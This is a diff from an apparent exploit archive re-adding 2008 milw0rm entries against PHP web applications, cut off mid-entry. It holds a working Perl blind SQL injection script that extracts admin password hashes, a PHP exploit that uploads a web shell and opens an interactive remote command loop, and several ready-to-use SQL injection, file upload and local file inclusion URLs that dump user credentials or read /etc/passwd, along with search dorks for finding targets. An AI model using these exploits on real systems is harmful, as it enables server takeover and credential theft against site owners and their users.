- }
-
-}
-
-# milw0rm.com [2008-06-25]
+#!/usr/bin/perl
+use LWP::UserAgent;
+use Getopt::Long;
+
+if(!$ARGV[1])
+{
+ print " \n";
+ print " #######################################################################\n";
+ print "  #   Mambo Component Articles Blind SQL Injection Exploit #\n";
+ print "  #   Author:Ded MustD!e [www.antichat.ru] #\n";
+ print "  # #\n";
+ print "  #   Dork :   inurl:option=articles artid #\n";
+ print "  #   Usage:   perl exploit.pl host path  #\n";
+ print "  #   Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n";
+ print "  # #\n";
+ print "  #   Options: #\n";
+ print "  #     -a   valid Article id #\n";
+ print " #######################################################################\n";
+ exit;
+}
+
+my $host    = $ARGV[0];
+my $path    = $ARGV[1];
+my $userid  = 1;
+my $aid     = $ARGV[2];
+
+my %options = ();
+GetOptions(\%options, "u=i", "p=s", "a=i");
+
+print "[~] Exploiting...\n";
+
+if($options{"u"})
+{
+ $userid = $options{"u"};
+}
+
+if($options{"a"})
+{
+ $aid = $options{"a"};
+}
+
+syswrite(STDOUT, "[~] MD5-Hash: ", 14);
+
+for(my $i = 1; $i <= 32; $i++)
+{
+ my $f = 0;
+ my $h = 48;
+ while(!$f && $h <= 57)
+ {
+   if(istrue2($host, $path, $userid, $aid, $i, $h))
+   {
+     $f = 1;
+     syswrite(STDOUT, chr($h), 1);
+   }
+   $h++;
+ }
+ if(!$f)
+ {
+   $h = 97;
+   while(!$f && $h <= 122)
+   {
+     if(istrue2($host, $path, $userid, $aid, $i, $h))
+     {
+       $f = 1;
+       syswrite(STDOUT, chr($h), 1);
+     }
+     $h++;
+   }
+ }
+}
+
+print "\n[~] Exploiting done\n";
+
+sub istrue2
+{
+ my $host  = shift;
+ my $path  = shift;
+ my $uid   = shift;
+ my $aid   = shift;
+ my $i     = shift;
+ my $h     = shift;
+
+ my $ua = LWP::UserAgent->new;
+ my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";
+
+ if($options{"p"})
+ {
+   $ua->proxy('http', "http://".$options{"p"});
+ }
+
+ my $resp = $ua->get($query);
+ my $content = $resp->content;
+ my $regexp = "Back";
+
+ if($content =~ /$regexp/)
+ {
+   return 1;
+ }
+ else
+ {
+   return 0;
+ }
+
+}
+
+# milw0rm.com [2008-06-25]
diff --git a/platforms/php/webapps/5936.txt b/platforms/php/webapps/5936.txt
index 7eaf56dea..f2b9fcc21 100755
--- a/platforms/php/webapps/5936.txt
+++ b/platforms/php/webapps/5936.txt
@@ -1,45 +1,45 @@
-================================================================
-  Page Manager CMS Remote Arbitrary File Upload Vulnerability
-================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 25 June 2008
-SITE   : www.citec.us
-
-
-#####################################################
- APPLICATION : Page Manager 
- VERSION     : 2006-02-04
- VENDOR      : N/A
- DOWNLOAD    : http://downloads.sourceforge.net/pagemanager
-#####################################################
-
----Arbitrary File Upload Exploit---
-
-	This Vulnerability can upload malicious files direct to web server.
-
-[Anonymous Can arbitrary upload]
-
-[+] Upload Path: http://[Target]/[pagemanager_path]/upload.php
-
-[+] Shell Script: http://[Target]/[Evil File]
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-25]
+================================================================
+  Page Manager CMS Remote Arbitrary File Upload Vulnerability
+================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 25 June 2008
+SITE   : www.citec.us
+
+
+#####################################################
+ APPLICATION : Page Manager 
+ VERSION     : 2006-02-04
+ VENDOR      : N/A
+ DOWNLOAD    : http://downloads.sourceforge.net/pagemanager
+#####################################################
+
+---Arbitrary File Upload Exploit---
+
+	This Vulnerability can upload malicious files direct to web server.
+
+[Anonymous Can arbitrary upload]
+
+[+] Upload Path: http://[Target]/[pagemanager_path]/upload.php
+
+[+] Shell Script: http://[Target]/[Evil File]
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-25]
diff --git a/platforms/php/webapps/5937.txt b/platforms/php/webapps/5937.txt
index 31c039afd..e8840f0c1 100755
--- a/platforms/php/webapps/5937.txt
+++ b/platforms/php/webapps/5937.txt
@@ -1,64 +1,64 @@
-===============================================================
-  MyPHP CMS (page.php pid) Remote SQL Injection Vulnerability
-===============================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 25 June 2008
-SITE   : www.citec.us
-
-
-#####################################################
- APPLICATION : MyPHP CMS
- VERSION     : 0.3.1
- VENDOR      : N/A
- DOWNLOAD    : http://downloads.sourceforge.net/myphpcms
-#####################################################
-
---- Remote SQL Injection ---
-
-** Magic Quote must turn off **
-
----------------------------------
- Vulnerable File [page.php?pid=]
----------------------------------
-
-@Line 
-
-   13:   $psql = "SELECT  * FROM ".$table_prefix."pages WHERE pid='$pid'";
-   14:	 $pprocess = mysql_query ( $psql );
-   15:	 $prow = mysql_fetch_array ( $pprocess );
-
----------
- Exploit
----------
-
-[+] http://[Target]/[myphpcms_path]/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/[prefix_users]/**/WHERE/**/uid='1
-
-	This exploit can dump username and password in clear text
-
--------------
- POC Exploit
--------------
-
-[+] http://192.168.24.25/myphpcms/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/users/**/WHERE/**/uid='1
-
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-25]
+===============================================================
+  MyPHP CMS (page.php pid) Remote SQL Injection Vulnerability
+===============================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 25 June 2008
+SITE   : www.citec.us
+
+
+#####################################################
+ APPLICATION : MyPHP CMS
+ VERSION     : 0.3.1
+ VENDOR      : N/A
+ DOWNLOAD    : http://downloads.sourceforge.net/myphpcms
+#####################################################
+
+--- Remote SQL Injection ---
+
+** Magic Quote must turn off **
+
+---------------------------------
+ Vulnerable File [page.php?pid=]
+---------------------------------
+
+@Line 
+
+   13:   $psql = "SELECT  * FROM ".$table_prefix."pages WHERE pid='$pid'";
+   14:	 $pprocess = mysql_query ( $psql );
+   15:	 $prow = mysql_fetch_array ( $pprocess );
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[myphpcms_path]/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/[prefix_users]/**/WHERE/**/uid='1
+
+	This exploit can dump username and password in clear text
+
+-------------
+ POC Exploit
+-------------
+
+[+] http://192.168.24.25/myphpcms/pages.php?pid=-9999'/**/UNION/**/SELECT/**/1,username,3,password,5,6/**/FROM/**/users/**/WHERE/**/uid='1
+
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-25]
diff --git a/platforms/php/webapps/5938.php b/platforms/php/webapps/5938.php
index f16ae3c21..c9a7687c0 100755
--- a/platforms/php/webapps/5938.php
+++ b/platforms/php/webapps/5938.php
@@ -1,234 +1,234 @@
-= $limit_size) {
-	269.	            // Display file size error
-	270.	            // ///////////////////////
-	271.	            $show = 1;
-	272.	            $message_type = $config["notification_success"];//the messsage displayed at the top coner
-	273.	            $error_message = 'Your image is too large. The maximum size allowed is: ' . $config['maximum_size_human_readale'];
-	274.	            $blk_id = 1;//html table - error block
-	275.	            $template = "templates/main_1.htm";
-	276.	            $inner_template1 = "templates/inner_myaccount_update_profile.htm";//middle of page
-	277.	            $TBS = new clsTinyButStrong;
-	278.	            $TBS->NoErr = true;// no more error message displayed.
-	279.	            $TBS->LoadTemplate("$template");
-	280.	            $TBS->Render = TBS_OUTPUT;
-	281.	            $TBS->Show();
-	282.	            
-	283.	            @mysql_close();
-	284.	            die();
-	285.	        }
-	286.	        else {
-	287.	            $filetype = $_FILES['ufile']['type']; <=======
-	288.	            if ($filetype == "image/gif" || $filetype == "image/jpeg" || $filetype ==
-	289.	                "image/pjpeg") {
-	290.	                // copy file to where you want to store file
-	291.	                if (@copy($_FILES['ufile']['tmp_name'], $path)) {
-	292.	                }
-	293.	                else {
-	294.	                    // Display general file copy error
-	
-	an attacker might be able to upload arbitrary malicious files with .php extension due to the code
-	near lines 287-289 will check only the MIME type of the upload request, that can be easily spoofed!
-*/
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-// yes, SQL injection vulnerable too!
-function retrive_data($field, $table, $clause)
-{
-	global $host, $path;
-	
-	$sql = "-1/**/UNION/**/SELECT/**/".str_repeat("1,",16)."{$field},".encodeSQL("yes").",1,1,1/**/FROM/**/{$table}/**/WHERE/**/{$clause}%23";
-
-	$packet  = "GET {$path}play.php?vid={$sql} HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
-	$packet .= "Connection: close\r\n\r\n";
-
-	preg_match("/play.php\?vid=(.*)\"/", http_send($host, $packet), $match);
-	return $match[1];
-}
-
-function encodeSQL($sql)
-{
-	for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i]));
-	return "CONCAT(0x{$encoded})";
-}
-
-function upload()
-{
-	global $host, $path, $sid, $username;
-
-	login();
-	
-	print "[-] Trying to upload a shell...\n";
-	
-	$payload  = "--o0oOo0o\r\n";
-	$payload .= "Content-Disposition: form-data; name=\"submitted_pic\"\r\n\r\nyes\r\n";
-	$payload .= "--o0oOo0o\r\n";
-	$payload .= "Content-Disposition: form-data; name=\"ufile\"; filename=\".php\"\r\n";
-	$payload .= "Content-Type: image/jpeg\r\n\r\n";
-	$payload .= "\r\n";
-	$payload .= "--o0oOo0o--\r\n";
-	
-	$packet  = "POST {$path}update_profile.php HTTP/1.0\r\n";
-	$packet .= "Host: {$host}\r\n";
-	$packet .= "Cookie: PHPSESSID={$sid}\r\n";
-	$packet .= "Content-Length: ".strlen($payload)."\r\n";
-	$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
-	$packet .= "Connection: close\r\n\r\n";
-	$packet .= $payload;
-
-	http_send($host, $packet);
-	
-	$user_id = (int) retrive_data("user_id", "member_profile", "user_name=".encodeSQL($username));
-	$file_name = retrive_data("file_name", "pictures", "user_id={$user_id}");
-	
-	if (!isset($file_name)) die("\n[-] Upload failed...\n");
-	else return $file_name;
-}
-
-function login()
-{
-	global $host, $path, $username, $password, $sid;
-	
-	print "\n[-] Logging in with username '{$username}' and password '{$password}'\n";
-	
-	$data	= "user_name_login={$username}&password_login={$password}&submitted=yes";
-	$packet = "POST {$path}login.php HTTP/1.0\r\n";
-	$packet.= "Host: {$host}\r\n";
-	$packet.= "Content-Length: ".strlen($data)."\r\n";
-	$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
-	$packet.= "Connection: close\r\n\r\n";
-	$packet.= $data;
-	$html	= http_send($host, $packet);
-	
-	preg_match("/PHPSESSID=([0-9a-f]{32})/i", $html, $match);
-	$sid = $match[1];
-	
-	if (!preg_match("/Location: myaccount.php/i", $html))
-	{
-		print "[-] Login failed!\n";
-		register();
-		login();
-	}
-}
-
-function register()
-{
-	global $host, $path, $username, $password;
-	
-	print "\n[-] Registering new user '{$username}' with password '{$password}'\n";
-	
-	// register a new account
-	$data	= "user_name={$username}";
-	$data  .= "&password={$password}";
-	$data  .= "&confirm_password={$password}";
-	$data  .= "&email_address=".md5(time())."@null.com";
-	$data  .= "&form_submitted=yes";
-	$data  .= "&terms=yes";
-	$packet = "POST {$path}register.php HTTP/1.0\r\n";
-	$packet.= "Host: {$host}\r\n";
-	$packet.= "Content-Length: ".strlen($data)."\r\n";
-	$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
-	$packet.= "Connection: close\r\n\r\n";
-	$packet.= $data;
-	
-	http_send($host, $packet);
-	
-	$code = retrive_data("random_code", "member_profile", "user_name=".encodeSQL($username));
-	if (!isset($code)) die("\n[-] Registration failed...\n");
-	
-	// and confirm the registration
-	$packet = "GET {$path}confirm.php?id={$code} HTTP/1.0\r\n";
-	$packet.= "Host: {$host}\r\n";
-	$packet.= "Connection: close\r\n\r\n";
-	
-	if (!preg_match("/registration is now complete/i", http_send($host, $packet))) die("\n[-] Registration failed...\n");
-}
-
-print "\n+---------------------------------------------------------------------------+";
-print "\n| PHPmotion <= 2.0 (update_profile.php) Remote Shell Upload Exploit by EgiX |";
-print "\n+---------------------------------------------------------------------------+\n";
-
-if ($argc < 3)
-{
-	print "\nUsage......: php $argv[0] host path\n";
-	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /phpmotion/\n";
-	die();
-}
-
-$host = $argv[1];
-$path = $argv[2];
-
-$username = "pr00f_0f";
-$password = "_c0nc3pt";
-
-$r_path = "pictures/".upload();
-
-define(STDIN, fopen("php://stdin", "r"));
-
-while(1)
-{
-	print "\nphpmotion-shell# ";
-	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
-	{
-		$packet = "GET {$path}{$r_path} HTTP/1.0\r\n";
-		$packet.= "Host: {$host}\r\n";
-		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet.= "Connection: close\r\n\r\n";
-		$output = http_send($host, $packet);
-		if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
-		$shell = explode("_code_", $output);
-		print "\n{$shell[1]}";
-	}
-	else break;
-}
-
-?>
-
-# milw0rm.com [2008-06-25]
+= $limit_size) {
+	269.	            // Display file size error
+	270.	            // ///////////////////////
+	271.	            $show = 1;
+	272.	            $message_type = $config["notification_success"];//the messsage displayed at the top coner
+	273.	            $error_message = 'Your image is too large. The maximum size allowed is: ' . $config['maximum_size_human_readale'];
+	274.	            $blk_id = 1;//html table - error block
+	275.	            $template = "templates/main_1.htm";
+	276.	            $inner_template1 = "templates/inner_myaccount_update_profile.htm";//middle of page
+	277.	            $TBS = new clsTinyButStrong;
+	278.	            $TBS->NoErr = true;// no more error message displayed.
+	279.	            $TBS->LoadTemplate("$template");
+	280.	            $TBS->Render = TBS_OUTPUT;
+	281.	            $TBS->Show();
+	282.	            
+	283.	            @mysql_close();
+	284.	            die();
+	285.	        }
+	286.	        else {
+	287.	            $filetype = $_FILES['ufile']['type']; <=======
+	288.	            if ($filetype == "image/gif" || $filetype == "image/jpeg" || $filetype ==
+	289.	                "image/pjpeg") {
+	290.	                // copy file to where you want to store file
+	291.	                if (@copy($_FILES['ufile']['tmp_name'], $path)) {
+	292.	                }
+	293.	                else {
+	294.	                    // Display general file copy error
+	
+	an attacker might be able to upload arbitrary malicious files with .php extension due to the code
+	near lines 287-289 will check only the MIME type of the upload request, that can be easily spoofed!
+*/
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+
+function http_send($host, $packet)
+{
+	$sock = fsockopen($host, 80);
+	while (!$sock)
+	{
+		print "\n[-] No response from {$host}:80 Trying again...";
+		$sock = fsockopen($host, 80);
+	}
+	fputs($sock, $packet);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
+	fclose($sock);
+	return $resp;
+}
+
+// yes, SQL injection vulnerable too!
+function retrive_data($field, $table, $clause)
+{
+	global $host, $path;
+	
+	$sql = "-1/**/UNION/**/SELECT/**/".str_repeat("1,",16)."{$field},".encodeSQL("yes").",1,1,1/**/FROM/**/{$table}/**/WHERE/**/{$clause}%23";
+
+	$packet  = "GET {$path}play.php?vid={$sql} HTTP/1.0\r\n";
+	$packet .= "Host: {$host}\r\n";
+	$packet .= "Connection: close\r\n\r\n";
+
+	preg_match("/play.php\?vid=(.*)\"/", http_send($host, $packet), $match);
+	return $match[1];
+}
+
+function encodeSQL($sql)
+{
+	for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i]));
+	return "CONCAT(0x{$encoded})";
+}
+
+function upload()
+{
+	global $host, $path, $sid, $username;
+
+	login();
+	
+	print "[-] Trying to upload a shell...\n";
+	
+	$payload  = "--o0oOo0o\r\n";
+	$payload .= "Content-Disposition: form-data; name=\"submitted_pic\"\r\n\r\nyes\r\n";
+	$payload .= "--o0oOo0o\r\n";
+	$payload .= "Content-Disposition: form-data; name=\"ufile\"; filename=\".php\"\r\n";
+	$payload .= "Content-Type: image/jpeg\r\n\r\n";
+	$payload .= "\r\n";
+	$payload .= "--o0oOo0o--\r\n";
+	
+	$packet  = "POST {$path}update_profile.php HTTP/1.0\r\n";
+	$packet .= "Host: {$host}\r\n";
+	$packet .= "Cookie: PHPSESSID={$sid}\r\n";
+	$packet .= "Content-Length: ".strlen($payload)."\r\n";
+	$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
+	$packet .= "Connection: close\r\n\r\n";
+	$packet .= $payload;
+
+	http_send($host, $packet);
+	
+	$user_id = (int) retrive_data("user_id", "member_profile", "user_name=".encodeSQL($username));
+	$file_name = retrive_data("file_name", "pictures", "user_id={$user_id}");
+	
+	if (!isset($file_name)) die("\n[-] Upload failed...\n");
+	else return $file_name;
+}
+
+function login()
+{
+	global $host, $path, $username, $password, $sid;
+	
+	print "\n[-] Logging in with username '{$username}' and password '{$password}'\n";
+	
+	$data	= "user_name_login={$username}&password_login={$password}&submitted=yes";
+	$packet = "POST {$path}login.php HTTP/1.0\r\n";
+	$packet.= "Host: {$host}\r\n";
+	$packet.= "Content-Length: ".strlen($data)."\r\n";
+	$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
+	$packet.= "Connection: close\r\n\r\n";
+	$packet.= $data;
+	$html	= http_send($host, $packet);
+	
+	preg_match("/PHPSESSID=([0-9a-f]{32})/i", $html, $match);
+	$sid = $match[1];
+	
+	if (!preg_match("/Location: myaccount.php/i", $html))
+	{
+		print "[-] Login failed!\n";
+		register();
+		login();
+	}
+}
+
+function register()
+{
+	global $host, $path, $username, $password;
+	
+	print "\n[-] Registering new user '{$username}' with password '{$password}'\n";
+	
+	// register a new account
+	$data	= "user_name={$username}";
+	$data  .= "&password={$password}";
+	$data  .= "&confirm_password={$password}";
+	$data  .= "&email_address=".md5(time())."@null.com";
+	$data  .= "&form_submitted=yes";
+	$data  .= "&terms=yes";
+	$packet = "POST {$path}register.php HTTP/1.0\r\n";
+	$packet.= "Host: {$host}\r\n";
+	$packet.= "Content-Length: ".strlen($data)."\r\n";
+	$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
+	$packet.= "Connection: close\r\n\r\n";
+	$packet.= $data;
+	
+	http_send($host, $packet);
+	
+	$code = retrive_data("random_code", "member_profile", "user_name=".encodeSQL($username));
+	if (!isset($code)) die("\n[-] Registration failed...\n");
+	
+	// and confirm the registration
+	$packet = "GET {$path}confirm.php?id={$code} HTTP/1.0\r\n";
+	$packet.= "Host: {$host}\r\n";
+	$packet.= "Connection: close\r\n\r\n";
+	
+	if (!preg_match("/registration is now complete/i", http_send($host, $packet))) die("\n[-] Registration failed...\n");
+}
+
+print "\n+---------------------------------------------------------------------------+";
+print "\n| PHPmotion <= 2.0 (update_profile.php) Remote Shell Upload Exploit by EgiX |";
+print "\n+---------------------------------------------------------------------------+\n";
+
+if ($argc < 3)
+{
+	print "\nUsage......: php $argv[0] host path\n";
+	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /phpmotion/\n";
+	die();
+}
+
+$host = $argv[1];
+$path = $argv[2];
+
+$username = "pr00f_0f";
+$password = "_c0nc3pt";
+
+$r_path = "pictures/".upload();
+
+define(STDIN, fopen("php://stdin", "r"));
+
+while(1)
+{
+	print "\nphpmotion-shell# ";
+	$cmd = trim(fgets(STDIN));
+	if ($cmd != "exit")
+	{
+		$packet = "GET {$path}{$r_path} HTTP/1.0\r\n";
+		$packet.= "Host: {$host}\r\n";
+		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+		$packet.= "Connection: close\r\n\r\n";
+		$output = http_send($host, $packet);
+		if (!preg_match("/_code_/", $output)) die("\n[-] Exploit failed...\n");
+		$shell = explode("_code_", $output);
+		print "\n{$shell[1]}";
+	}
+	else break;
+}
+
+?>
+
+# milw0rm.com [2008-06-25]
diff --git a/platforms/php/webapps/5939.txt b/platforms/php/webapps/5939.txt
index ac93ac74f..5c9da023e 100755
--- a/platforms/php/webapps/5939.txt
+++ b/platforms/php/webapps/5939.txt
@@ -1,21 +1,21 @@
-/---------------------------------------------------------------\
-\                                				/
-/       Joomla Component netinvoice Remote SQL injection        \
-\                                				/
-\---------------------------------------------------------------/
-
-
-[*] Author    :  His0k4 [ALGERIAN HaCkEr]
-
-[*] Dork      :  inurl:com_netinvoice
-
-[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid={SQL}
-
-[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users--
-
-                
-----------------------------------------------------------------------------
-[*] Greetings :  All friends & muslims HaCkeRs...
-[*] Greetings2:  http://palcastle.org/cc
-
-# milw0rm.com [2008-06-25]
+/---------------------------------------------------------------\
+\                                				/
+/       Joomla Component netinvoice Remote SQL injection        \
+\                                				/
+\---------------------------------------------------------------/
+
+
+[*] Author    :  His0k4 [ALGERIAN HaCkEr]
+
+[*] Dork      :  inurl:com_netinvoice
+
+[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid={SQL}
+
+[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users--
+
+                
+----------------------------------------------------------------------------
+[*] Greetings :  All friends & muslims HaCkeRs...
+[*] Greetings2:  http://palcastle.org/cc
+
+# milw0rm.com [2008-06-25]
diff --git a/platforms/php/webapps/5940.txt b/platforms/php/webapps/5940.txt
index d770c88f3..db6cbce8d 100755
--- a/platforms/php/webapps/5940.txt
+++ b/platforms/php/webapps/5940.txt
@@ -1,71 +1,71 @@
-===========================================================
-  Keller Web Admin CMS Local File Inclusion Vulnerability
-===========================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 26 June 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : Keller Web Admin CMS
- VERSION     : 0.94 Pro
- VENDOR      : N/A
- DOWNLOAD    : http://downloads.sourceforge.net/kwa
-#####################################################
-
---- Local File Inclusion ---
-
--------------------------------------
- Vulnerable File [/Public/index.php]
--------------------------------------
-
-@Line 
-
-   21:  if (isset($_GET['action'])) {
-   22:  $action=$_GET['action'];
-   23:	$inclConfig = $includeFolder.$action.".inc.php";
-   24:	include($inclConfig);
-   25:	header('Location: '.$clnt_referer);
-   26:	die();
-   27:  }
-
----------
- Exploit
----------
-
-[+] http://[Target]/[kwa_path]/Public/index.php?action=[LFI]
-
--------------
- POC Exploit
--------------
-
-[+] http://192.168.24.25/kwa/Public/index.php?action=../../../../../../../../boot.ini%00
-
-    This exploit will open boot.ini in system file:
-
-[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
-
-    You can change boot.ini to /etc/passwd%00 in linux OS.
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-26]
+===========================================================
+  Keller Web Admin CMS Local File Inclusion Vulnerability
+===========================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 26 June 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : Keller Web Admin CMS
+ VERSION     : 0.94 Pro
+ VENDOR      : N/A
+ DOWNLOAD    : http://downloads.sourceforge.net/kwa
+#####################################################
+
+--- Local File Inclusion ---
+
+-------------------------------------
+ Vulnerable File [/Public/index.php]
+-------------------------------------
+
+@Line 
+
+   21:  if (isset($_GET['action'])) {
+   22:  $action=$_GET['action'];
+   23:	$inclConfig = $includeFolder.$action.".inc.php";
+   24:	include($inclConfig);
+   25:	header('Location: '.$clnt_referer);
+   26:	die();
+   27:  }
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[kwa_path]/Public/index.php?action=[LFI]
+
+-------------
+ POC Exploit
+-------------
+
+[+] http://192.168.24.25/kwa/Public/index.php?action=../../../../../../../../boot.ini%00
+
+    This exploit will open boot.ini in system file:
+
+[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
+
+    You can change boot.ini to /etc/passwd%00 in linux OS.
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5941.txt b/platforms/php/webapps/5941.txt
index 267791e5b..b499cc9ad 100755
--- a/platforms/php/webapps/5941.txt
+++ b/platforms/php/webapps/5941.txt
@@ -1,59 +1,59 @@
-=================================================================
-  PolyPager <= 1.0rc2 (SQL/XSS) Multiple Remote Vulnerabilities
-=================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 26 June 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : PolyPager
- VERSION     : <= 1.0rc2
- VENDOR      : http://polypager.nicolashoening.de/
- DOWNLOAD    : http://downloads.sourceforge.net/polypager
-#####################################################
-
---- Remote SQL Injection (nr) ---
-
----------
- Exploit
----------
-
-[+] http://[Target]/[polypager_path]/?[Web Page]&nr=[SQL Injection]
-
-This exploit can dump username and password in clear text
-
--------------
- POC Exploit
--------------
-
-[+] http://192.168.24.25/polypager/?Test&nr=-999/**/UNION/**/SELECT/**/1,2,3,4,admin_name,admin_pass,7,8,9,10/**/FROM/**/_sys_sys--
-
-
---- Remote XSS ---
-
----------
- Exploit
----------
-
-[+] http://[Target]/polypager/?[Web Page]&nr=[XSS]
-
-##################################################################
